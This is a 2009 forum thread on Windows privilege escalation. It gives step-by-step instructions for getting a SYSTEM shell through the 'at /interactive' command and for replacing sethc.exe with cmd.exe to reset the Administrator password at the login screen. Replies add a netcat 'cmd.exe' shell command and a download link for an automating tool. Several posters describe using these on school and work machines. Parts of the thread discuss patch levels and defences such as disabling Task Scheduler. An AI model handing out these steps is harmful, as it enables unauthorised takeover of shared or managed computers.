The Sorrow Posted July 9, 2009 Share Posted July 9, 2009 This process will grant the user SYSTEM level access and basically admin permissions. 1. open a command prompt and type in [at XX:XX(Put here the current time plus one minute in military time) /interactive "cmd.exe"] For example if its 10 am you would enter [at 10:01 /interactive "cmd.exe"] 2. Press Ctrl + Alt + Del to bring up task manager and kill "explorer.exe" 3. At 10:01 a new command prompt will open in this new konsole type in [explorer] 4. Now you will notice that the windows default visual settings are now loaded and the user name on the start menu is now SYSTEM This exploit can be used even on guest accounts on any windows 2000 or higher (Don't know bout Vista yet). Have fun Quote Link to comment Share on other sites More sharing options...
digip Posted July 10, 2009 Share Posted July 10, 2009 2 things. #1, that is really slick and could come in handy in the future. Thanks for the tip! #2, it didn't work on my machine but I also know why. In order for this to work, the "Task Scheduler" service has to be running, and I have it disabled by default. As soon as I started the service and ran your command it worked. Quote Link to comment Share on other sites More sharing options...
return.404 Posted July 10, 2009 Share Posted July 10, 2009 Alot of (particularily highly customized) domain controllers protect from this type of attack by disabling the task scheduler service. As this is quite an old exploit it's only really relevant to older, probably personal - non commercial systems. Quote Link to comment Share on other sites More sharing options...
The Sorrow Posted July 10, 2009 Author Share Posted July 10, 2009 yea i tried it on my school's SP1 XP boxes and they have that service disabled :( but it works on a lot of the other terminals that are in our tech lab so it has its perks Quote Link to comment Share on other sites More sharing options...
SomethingToChatWith Posted July 10, 2009 Share Posted July 10, 2009 Wouldn't UAC protect against this? I'm amazed its that simple. And here people are thinking the screensaver login trick in 2000 was 1337. Quote Link to comment Share on other sites More sharing options...
moonlit Posted July 10, 2009 Share Posted July 10, 2009 It got patched in XP SP2. Very old trick, probably covered elsewhere on the forum somewhere, I forget. Quote Link to comment Share on other sites More sharing options...
SomethingToChatWith Posted July 10, 2009 Share Posted July 10, 2009 You sure about that? I just got done trying it on my XP SP3 box without issue. Quote Link to comment Share on other sites More sharing options...
digip Posted July 10, 2009 Share Posted July 10, 2009 It got patched in XP SP2. Very old trick, probably covered elsewhere on the forum somewhere, I forget. Works on my SP3, but I had to manually start the service, as I have it set to disabled. I don't think this is a patch issue though, since services like that one run as system level anyway, if they are the one starting a process and the default user shell is gone(ie:cancel explorer.exe before the task spawns) then cmd becomes the new shell at system user level, and since its started by a system process, it spawns the system user when you run explorer.exe from the cmd window. ** You might even be able to edit: Just tried it and this works as well, just skip cmd.exe and point it to explorer.exe instead, then kill explorere.exe after putting in the at command and wait for the desktop to respawn. This works even nicer, as it saved my wallpaper and custom theme. I'll have to try this now to see if that works as well. ** I noticed in Vista Task Scheduler can not be disabled, so this might work in Vista, but I don't think you can easily kill explorer.exe in vista like you can in XP. Don't have Vista installed on anything at the moment, so can't test that one though. Quote Link to comment Share on other sites More sharing options...
moonlit Posted July 10, 2009 Share Posted July 10, 2009 SP2+ requires you to have an admin account to begin with, thus negating the entire point. You can do it with an admin account but not with a fully patched machine and a limited account. Quote Link to comment Share on other sites More sharing options...
digip Posted July 10, 2009 Share Posted July 10, 2009 Best to disable the task scheduler to begin with, as I always do on my personal machines anyway. SP2+ requires you to have an admin account to begin with, thus negating the entire point. You can do it with an admin account but not with a fully patched machine and a limited account. This is true, you can't run the "AT" command as a Guest or limited account. Just tried it on my machine and was denied access to the "AT" command. But I know that at work, we have locked down machines and managed desktops and such that still allow us to run the "AT" command and Task Scheduler, because we use Task Scheduler all the time to launch certain jobs during the night. I use it reguarly for alerts on things I have to run at certain times of the night on the mainframe console. We don't have full admin control over the machine though since we logon to a domain and only have certain functions we can perform on these machines. I can see that in a coporate environment where you may have little more than limited functions, but access to the "AT" command, this could be used (or abused) by anyone who knows about it to gain higher privledges on the machine, and then use it to add additional users or rights to other users. Quote Link to comment Share on other sites More sharing options...
SomethingToChatWith Posted July 10, 2009 Share Posted July 10, 2009 Ok, the at command can be used by a limited account even in XP SP2. Don't believe me? Type "at /?" at the command prompt. You should see the help output for at. Now while you cant actually "use" the at command beyond viewing the help this is an ovbious giveaway. The task scheduler service still runs under the SYSTEM account. With any luck what I'm thinking is MS only patched the at command itself. Even a limited user can create tasks using the GUI. So what does this mean? I'm wondering if you can take a pre-sp2 XP version of the at command and use it? If MS only patched the at command stored on the local system whos to say you couldn't use an older version of at from say a flash drive... And yes digip, you're right on there. The way anything involving proccesses in Windows works is that child proccesses always get the amount of system access the parent proccess (in this case at running as the system account) has. Quote Link to comment Share on other sites More sharing options...
digip Posted July 10, 2009 Share Posted July 10, 2009 Ok, the at command can be used by a limited account even in XP SP2. Don't believe me? Type "at /?" at the command prompt. You should see the help output for at. Now while you cant actually "use" the at command beyond viewing the help this is an ovbious giveaway. The task scheduler service still runs under the SYSTEM account. With any luck what I'm thinking is MS only patched the at command itself. Even a limited user can create tasks using the GUI. So what does this mean? I'm wondering if you can take a pre-sp2 XP version of the at command and use it? If MS only patched the at command stored on the local system whos to say you couldn't use an older version of at from say a flash drive... And yes digip, you're right on there. The way anything involving proccesses in Windows works is that child proccesses always get the amount of system access the parent proccess (in this case at running as the system account) has. The AT command and the GUI do not work in a Gyest account. Havne't tried a limite duser account yet, but I assume they would need a group policy to grant them access to it, which is what we have at work on our domain logins, access to the at command. Quote Link to comment Share on other sites More sharing options...
pritchard9 Posted July 10, 2009 Share Posted July 10, 2009 Also, on a lot of machines I've used, which Ive wanted to root (school, work etc. Not maliciously, just curious) "Task Manager" has been disabled. Quote Link to comment Share on other sites More sharing options...
digip Posted July 10, 2009 Share Posted July 10, 2009 Also, on a lot of machines I've used, which Ive wanted to root (school, work etc. Not maliciously, just curious) "Task Manager" has been disabled. Thats a good point, but have you tried the command line versions? TASKLIST and TASKKILL Quote Link to comment Share on other sites More sharing options...
Saustin Posted July 10, 2009 Share Posted July 10, 2009 Guys, it works. The problem is that it hides the GUI. For example, if you had netcat installed onto your machine and you executed "at 12:20 'nc.exe 127.0.0.1 555 -e cmd.exe'" it would work. Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted July 10, 2009 Share Posted July 10, 2009 Old trick, to my knowledge it only works on XP Sp1, 2 and 3 Professional it may work on Home but i have not tested it. You must have administrative rights to do it. It's a far cry from "any Windows Machine," and i also wouldn't call it an exploit. This does NOT work on Vista, or Win7 and it also does not work from XP guest accounts, i dont know what Sorrow is smoking. A while ago I helped create a program to do this automatically, takes about 1-2 mins to complete, just run it and get SYSTEM, enjoy! Download SysHack Also, on a lot of machines I've used, which Ive wanted to root (school, work etc. Not maliciously, just curious) "Task Manager" has been disabled. You can generally use GPedit.msc, or a 3rd party registry editor to re-enable Task Manager/CMD if it's been disabled. (start>run>type "gpedit.msc") Quote Link to comment Share on other sites More sharing options...
The Sorrow Posted July 11, 2009 Author Share Posted July 11, 2009 well it worked with my SP3 machine at home under limited dont know if it was patched or not Quote Link to comment Share on other sites More sharing options...
redxine Posted July 13, 2009 Share Posted July 13, 2009 If you can get linux booted up on the machine and mount the hard drive, find C:\WINDOWS\System32\sethc.exe and rename it to something like sethc.exe.bak (just in case). Copy cmd.exe and rename the copy to sethc.exe. Reboot. At the login screen hit shift five times, and hear the joyous music and see the black box. Notice the SYSTEM username. Profit. I use this all the time to reset "forgotten" passwords. > user Administrator * Quote Link to comment Share on other sites More sharing options...
The Sorrow Posted July 13, 2009 Author Share Posted July 13, 2009 Wow, neat trick, assuming it works with a live distro im gonna have to try that some time. Quote Link to comment Share on other sites More sharing options...
SomethingToChatWith Posted July 14, 2009 Share Posted July 14, 2009 If you're goning to boot off something whats the point? I think kon-boot more than covers it. Quote Link to comment Share on other sites More sharing options...
barry99705 Posted July 14, 2009 Share Posted July 14, 2009 I think the thread title should be changed to "Gain Admin access on just installed Windows systems with no updates installed". So far on the five machine's I've tried this on, none worked. The at command is disabled. Kon-Boot also doesn't work on them. Kon-Boot only works with local users. You need to know the name of a local user on the windows machine. Administrator is disabled on all my work machines, and my home systems. They boot to the user name and password screen, not the stupid ass click a picture and put in your password screen. Quote Link to comment Share on other sites More sharing options...
Jonny190 Posted July 15, 2009 Share Posted July 15, 2009 Seems goot under xp sp3 but vista causes a problem by the uca Quote Link to comment Share on other sites More sharing options...
SomethingToChatWith Posted July 15, 2009 Share Posted July 15, 2009 edit: sorry, didnt see this post when I posted below. Delete if you want... Quote Link to comment Share on other sites More sharing options...
SomethingToChatWith Posted July 15, 2009 Share Posted July 15, 2009 I think the thread title should be changed to "Gain Admin access on just installed Windows systems with no updates installed". So far on the five machine's I've tried this on, none worked. The at command is disabled. Kon-Boot also doesn't work on them. Kon-Boot only works with local users. You need to know the name of a local user on the windows machine. Administrator is disabled on all my work machines, and my home systems. They boot to the user name and password screen, not the stupid ass click a picture and put in your password screen. Umm, can you say net user? You don't need admin access to get the usernames for the computer and I doubt you've enabled don't display last username so who cares if its not the welcome screen? Your username is already filled in by default. If you took the time to read through the thread you would have noticed patched XP machines and Vista safeguard against this escalation flaw in at by requring you to be admin to even use it. Quote Link to comment Share on other sites More sharing options...
redxine Posted July 17, 2009 Share Posted July 17, 2009 I think the thread title should be changed to "Gain Admin access on just installed Windows systems with no updates installed". So far on the five machine's I've tried this on, none worked. The at command is disabled. Kon-Boot also doesn't work on them. Kon-Boot only works with local users. You need to know the name of a local user on the windows machine. Administrator is disabled on all my work machines, and my home systems. They boot to the user name and password screen, not the stupid ass click a picture and put in your password screen. The sethc.exe method I used has worked reguardless of the Administrator account being disabled. The access to the net command is key, and at the login screen's SYSTEM user account gives us that in a nice little package. net user Administrator /active:yes net user Administrator * You should give it a try. EDIT: I was going to make a video demonstrating it, but virtualbox won't let me insert the 5 shifts for some reason. Any suggestions? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.